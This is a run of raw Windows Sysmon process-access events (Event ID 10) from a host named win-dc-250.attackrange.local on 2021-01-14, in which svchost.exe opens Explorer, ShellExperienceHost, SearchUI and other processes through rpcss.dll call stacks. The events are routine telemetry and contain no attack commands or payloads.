13:35:56.378{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:56.378{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:56.378{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:56.378{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:59.847{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:02.410{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 